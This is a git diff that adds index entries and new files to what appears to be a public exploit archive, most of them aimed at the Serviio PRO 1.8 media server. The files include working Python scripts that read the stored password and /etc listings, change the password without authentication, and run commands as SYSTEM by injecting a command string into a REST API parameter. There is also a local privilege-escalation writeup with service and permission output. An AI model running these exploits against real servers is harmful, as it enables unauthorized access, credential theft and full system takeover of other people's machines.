diff --git a/files.csv b/files.csv index 21ff475381..4649d1afd9 100644 --- a/files.csv +++ b/files.csv @@ -5482,6 +5482,7 @@ id,file,description,date,author,platform,type,port 41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0 41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0 41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0 +41957,platforms/windows/dos/41957.html,"Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -8967,6 +8968,7 @@ id,file,description,date,author,platform,type,port 41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0 41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0 41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0 +41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -37805,3 +37807,6 @@ id,file,description,date,author,platform,type,port 41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0 41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0 41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0 +41958,platforms/java/webapps/41958.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure",2017-05-03,LiquidWorm,java,webapps,0 +41960,platforms/java/webapps/41960.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change",2017-05-03,LiquidWorm,java,webapps,0 +41961,platforms/windows/webapps/41961.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution",2017-05-03,LiquidWorm,windows,webapps,0 diff --git a/platforms/java/webapps/41958.py b/platforms/java/webapps/41958.py new file mode 100755 index 0000000000..4a3cb4952f --- /dev/null +++ b/platforms/java/webapps/41958.py @@ -0,0 +1,141 @@ +#!/usr/bin/env python +# +# +# Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure +# +# +# Vendor: Petr Nejedly | Six Lines Ltd +# Product web page: http://www.serviio.org +# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1 +# +# Summary: Serviio is a free media server. It allows you to stream your media +# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, +# games console or mobile phone) on your connected home network. +# +# Vendor: +# "Security: +# MediaBrowser (as well as any app that uses the API) uses well proven security techniques, +# so that you can be sure your content is only accessed by you. Make sure you keep your password +# secure." +# +# Desc: The version of Serviio installed on the remote Windows/Linux host is affected +# by an information disclosure vulnerability due to improper access control enforcement +# of the Configuration REST API. An unauthenticated, remote attacker can exploit this, +# via a specially crafted request, to gain access to potentially sensitive information. +# +# Tested on: Restlet-Framework/2.2 +# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2017-5404 +# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php +# +# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094 +# +# +# 12.12.2016 +# + + +import sys +import xml.etree.ElementTree as ET +from urllib2 import Request, urlopen + +if (len(sys.argv) <= 2): + print '[*] Usage: serviio_id.py ' + print '[*] Example: serviio_id.py 10.211.55.3 23423' + exit(0) + +host = sys.argv[1] +port = sys.argv[2] + +headers = {'Accept': 'application/xml'} +request = Request('http://'+host+':'+port+'/rest/import-export/online', headers=headers) +print '\nPrinting ServiioLinks:' +print '----------------------\n' +response_body = urlopen(request).read() +roottree = ET.fromstring(response_body) + +for URLs in roottree.iter('serviioLink'): + print URLs.text + +print + +headers = {'Accept': 'application/xml'} +#request = Request('http://'+host+':'+port+'/rest/list-folders?directory=C:\\', headers=headers) +request = Request('http://'+host+':'+port+'/rest/list-folders?directory=/etc', headers=headers) +print '\nPrinting directories:' +print '---------------------\n' +response_body = urlopen(request).read() +roottree = ET.fromstring(response_body) + +for URLs in roottree.iter('path'): + print URLs.text + +print + +headers = {'Accept': 'application/xml'} +request = Request('http://'+host+':'+port+'/rest/remote-access', headers=headers) +print '\nPrinting mediabrowser password:' +print '-------------------------------\n' +response_body = urlopen(request).read() +roottree = ET.fromstring(response_body) + +for URLs in roottree.iter('remoteUserPassword'): + print URLs.text + +print + + +''' +rewt@zslab:~# python serviio_id.py 10.211.55.3 23423 + +Printing ServiioLinks: +---------------------- + +serviio://video:feed?url=http%3A%2F%2FRSSEXAMPLEURL%2Fzsl.xml +serviio://video:live?url=http%3A%2F%2FLIVESTREAMEXAMPLE%2Fzsl +serviio://video:web?url=http%3A%2F%2FWEBRESOURCEEXAMPLE%2Fzsl.resource + + +Printing directories: +--------------------- + +/etc/apache2 +/etc/asl +/etc/cups +/etc/defaults +/etc/emond.d +/etc/mach_init.d +/etc/mach_init_per_login_session.d +/etc/mach_init_per_user.d +/etc/manpaths.d +/etc/newsyslog.d +/etc/openldap +/etc/pam.d +/etc/paths.d +/etc/periodic +/etc/pf.anchors +/etc/postfix +/etc/ppp +/etc/racoon +/etc/security +/etc/snmp +/etc/ssh +/etc/ssl +/etc/sudoers.d + + +Printing mediabrowser password: +------------------------------- + +s3cr3to + +rewt@zslab:~# +''' \ No newline at end of file diff --git a/platforms/java/webapps/41960.py b/platforms/java/webapps/41960.py new file mode 100755 index 0000000000..3d9755a025 --- /dev/null +++ b/platforms/java/webapps/41960.py @@ -0,0 +1,77 @@ +#!/usr/bin/env python +# +# +# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Password Change +# +# +# Vendor: Petr Nejedly | Six Lines Ltd +# Product web page: http://www.serviio.org +# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1 +# +# Summary: Serviio is a free media server. It allows you to stream your media +# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, +# games console or mobile phone) on your connected home network. +# +# Desc: The version of Serviio installed on the remote Windows/Linux host is affected +# by an unauthenticated password modification vulnerability due to improper access +# control enforcement of the Configuration REST API. A remote attacker can exploit this, +# via a specially crafted request, to change the login password for the mediabrowser protected +# page. +# +# Tested on: Restlet-Framework/2.2 +# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2017-5407 +# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5407.php +# +# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094 +# +# +# 12.12.2016 +# + + +import sys +import xml.etree.ElementTree as ET +from urllib2 import Request, urlopen + +if (len(sys.argv) <= 3): + print '[*] Usage: serviio_pwd.py ' + print '[*] Example: serviio_pwd.py 10.211.55.3 23423 eagle20fox2' + exit(0) + +host = sys.argv[1] +port = sys.argv[2] #default port for console is 23423, and for the mediabrowser is 23424. +lozi = sys.argv[3] + +values = """ + + {0} + ORIGINAL + true + myserviio.dyndns.com +""" + +put = values.format(lozi) + +headers = { + 'Content-Type': 'application/xml', + 'Accept': 'application/xml' +} +request = Request('http://'+host+':'+port+'/rest/remote-access', data=put, headers=headers) +request.get_method = lambda: 'PUT' +response_body = urlopen(request).read() +roottree = ET.fromstring(response_body) + +for errorcode in roottree.iter('errorCode'): + print "\nReceived error code: "+errorcode.text + +print 'Password successfully changed to: '+lozi +print 'Go to: http://'+host+':23424/mediabrowser\n' diff --git a/platforms/windows/dos/41957.html b/platforms/windows/dos/41957.html new file mode 100755 index 0000000000..d0b82147ad --- /dev/null +++ b/platforms/windows/dos/41957.html @@ -0,0 +1,145 @@ + + + + + + + + + + + + + IE11 MSHTML!CMarkup::DestroySplayTree Use-After-Free + + + + + \ No newline at end of file diff --git a/platforms/windows/local/41959.txt b/platforms/windows/local/41959.txt new file mode 100755 index 0000000000..acb40253b8 --- /dev/null +++ b/platforms/windows/local/41959.txt @@ -0,0 +1,66 @@ +Serviio PRO 1.8 DLNA Media Streaming Server Local Privilege Escalation + + +Vendor: Petr Nejedly | Six Lines Ltd +Product web page: http://www.serviio.org +Affected version: 1.8.0.0 PRO + +Summary: Serviio is a free media server. It allows you to stream your media +files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, +games console or mobile phone) on your connected home network. + +Desc: The application suffers from an unquoted search path issue impacting the service +'Serviio' for Windows deployed as part of Serviio DLNA server solution. This could potentially +allow an authorized but non-privileged local user to execute arbitrary code with elevated +privileges on the system. A successful attempt would require the local user to be able to +insert their code in the system root path undetected by the OS or other security applications +where it could potentially be executed during application startup or reboot. If successful, the +local user’s code would execute with the elevated privileges of the application. + +Serviio also suffers from improper permissions which can be used by a simple authenticated user +that can change the executable file with a binary of choice. The vulnerability exist due to the +improper permissions, with the 'F' flag (Full) for 'Users' group, for the Serviio directory and +its sub-directories. + + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Microsoft Windows 7 Ultimate SP1 (EN) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5405 +Advisory URL: http://www.zeroscience.mk/en/vulnerability/ZSL-2017-5405.php + +SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094 + + +12.12.2016 + +--- + + +C:\>sc qc Serviio +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Serviio + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Serviio\bin\ServiioService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Serviio + DEPENDENCIES : HTTP + SERVICE_START_NAME : LocalSystem + +C:\>icacls "C:\Program Files\Serviio\bin\ServiioService.exe" +C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Administrators:(I)(F) + +Successfully processed 1 files; Failed processing 0 files + +C:\> diff --git a/platforms/windows/webapps/41961.py b/platforms/windows/webapps/41961.py new file mode 100755 index 0000000000..b6bcac65a1 --- /dev/null +++ b/platforms/windows/webapps/41961.py @@ -0,0 +1,156 @@ +#!/usr/bin/env python +# +# +# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution +# +# +# Vendor: Petr Nejedly | Six Lines Ltd +# Product web page: http://www.serviio.org +# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1 +# +# Summary: Serviio is a free media server. It allows you to stream your media +# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, +# games console or mobile phone) on your connected home network. +# +# Desc: The version of Serviio installed on the remote Windows host is affected by +# an unauthenticated remote code execution vulnerability due to improper access control +# enforcement of the Configuration REST API and unsanitized input when FFMPEGWrapper +# calls cmd.exe to execute system commands. A remote attacker can exploit this with a +# simple JSON request, gaining system access with SYSTEM privileges via a specially +# crafted request and escape sequence. +# +# ================================================================================= +# org/serviio/ui/resources/server/ActionsServerResource.java: +# ----------------------------------------------------------- +# +# private ResultRepresentation checkStreamUrl(ActionRepresentation representation) { +# this.validateParameters(representation, 2); +# try { +# MediaFileType fileType = MediaFileType.valueOf(representation.getParameters().get(0)); +# String url = StringUtils.trim(representation.getParameters().get(1)); +# LocalItemMetadata md = MetadataFactory.getMetadataInstance(fileType); +# DeliveryContext context = fileType == MediaFileType.VIDEO ? new VideoDeliveryContext(false, null) : new AudioDeliveryContext(false, null); +# FFmpegMetadataRetriever.retrieveOnlineMetadata(md, url, context); +# return this.responseOk(); +# } +# catch (InvalidMediaFormatException e) { +# return this.responseOk(603); +# } +# +# ================================================================================= +# serviio.jar / external / ProcessExecutor.java: +# ---------------------------------------------- +# +# private Map createWindowsRuntimeEnvironmentVariables() { +# HashMap newEnv = new HashMap(); +# newEnv.putAll(System.getenv()); +# ProcessExecutorParameter[] i18n = new ProcessExecutorParameter[this.commandArguments.length + 2]; +# i18n[0] = new ProcessExecutorParameter("cmd"); +# i18n[1] = new ProcessExecutorParameter("/C"); +# for (int counter = 0; counter < this.commandArguments.length; ++counter) { +# ProcessExecutorParameter argument = this.commandArguments[counter]; +# String envName = "JENV_" + counter; +# i18n[counter + 2] = new ProcessExecutorParameter("%" + envName + "%"); +# boolean quotesNeededForWindows = this.quotesNeededForWindows(argument); +# if (!quotesNeededForWindows) { +# argument = new ProcessExecutorParameter(this.escapeAmpersandForWindows(argument.getValue())); +# } +# newEnv.put(envName, this.wrapInQuotes(argument, quotesNeededForWindows)); +# } +# this.commandArguments = i18n; +# String[] tempPath = FileUtils.splitFilePathToDriveAndRest(System.getProperty("java.io.tmpdir")); +# newEnv.put("HOMEDRIVE", tempPath[0]); +# newEnv.put("HOMEPATH", tempPath[1]); +# newEnv.putAll(this.createFontConfigRuntimeEnvironmentVariables()); +# if (log.isTraceEnabled()) { +# log.trace(String.format("Env variables: %s", newEnv.toString())); +# } +# return newEnv; +# } +# +# private String wrapInQuotes(ProcessExecutorParameter argument, boolean quotesNeeded) { +# return (quotesNeeded ? "\"" : "") + argument + (quotesNeeded ? "\"" : ""); +# } +# +# protected boolean quotesNeededForWindows(ProcessExecutorParameter argument) { +# boolean quotesNeeded = argument.getValue().indexOf(" ") > -1; +# return quotesNeeded; +# } +# +# private String escapeAmpersandForWindows(String value) { +# return value.replaceAll("&", "^&"); +# } +# +# ================================================================================= +# +# Tested on: Restlet-Framework/2.2 +# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# Java/1.8.0_121 +# Java/1.8.0_111 +# Java/1.8.0_91 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2017-5408 +# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php +# +# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094 +# +# +# 12.12.2016 +# + + +# +# The PoC will create a file testingus3.txt in 'C:\Program Files\Serviio\bin' with whoami +# output in it and start a calc.exe child process as nt authority\system. +# + +from urllib2 import Request, urlopen +import sys + +if (len(sys.argv) <= 1): + print '[*] Usage: serviio_rce.py ' + exit(0) + +host = sys.argv[1] + +values = """ + + checkStreamUrl + VIDEO + 1.2.3.4'\"`&whoami >testingus3.txt&&calc&`' +""" + +headers = { + 'Content-Type': 'application/xml', + 'Accept': 'application/xml' +} +request = Request('http://'+host+':23423/rest/action', data=values, headers=headers) + +response_body = urlopen(request).read() +print response_body + + +''' +Raw request: + +POST /rest/action HTTP/1.1 +Host: 10.211.55.3:23423 +Content-Length: 93 +Accept: application/json, text/plain, */* +Origin: http://10.211.55.3:23423 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36 +Content-Type: application/json;charset=UTF-8 +Referer: http://10.211.55.3:23423/console/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +DNT: 1 +Connection: close + +{"name":"checkStreamUrl","parameter":["VIDEO","1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'"]} + +'''